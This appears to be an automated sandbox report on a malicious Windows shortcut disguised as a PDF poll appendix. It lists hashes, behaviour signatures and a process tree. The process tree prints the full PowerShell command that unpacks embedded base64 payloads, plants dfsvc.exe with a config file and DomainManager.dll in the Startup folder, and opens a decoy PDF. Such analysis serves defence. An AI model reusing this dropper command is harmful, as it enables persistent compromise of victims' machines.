Analysis
-
max time kernel
26s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
23/10/2024, 13:04
General
-
Target
Quarterly Cambodia Poll Appendix.pdf.lnk
-
Size
2.2MB
-
MD5
23d55b0f6a502c7ed3a70d41272b0732
-
SHA1
36a2c2cd63e3ca23a7934cfb3e7a957f2b5363f8
-
SHA256
cfbd704cab3a8edd64f8bf89da7e352adf92bd187b3a7e4d0634a2dc764262b5
-
SHA512
53984a522f5629f3bf64e62f9855254c74497388f0632e76b00fb16fba7b7fb45ffe2c0db7cd0e7016847f2a5d966e42b3081a47d6fc9a067c6bd0d9d9e752af
-
SSDEEP
49152:zrdLymX/jNT7IBkZw3xFdyaxDadhCtbdMuC4vmYrl4GRGjEOaUJiuw:
Score
7/10
Malware Config
Signatures
-
Drops startup file 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Quarterly Cambodia Poll Appendix.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Quarterly Cambodia Poll Appendix.pdf.lnk').Directory).Name+'\'+'Quarterly Cambodia Poll Appendix.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Quarterly Cambodia Poll Appendix.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](2298152);$k.Seek(2953,[IO.SeekOrigin]::Begin);$k.Read($b,0,2298152);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::WriteAllBytes($env:temp+'\e.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\e.pdf');2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\e.pdf3⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB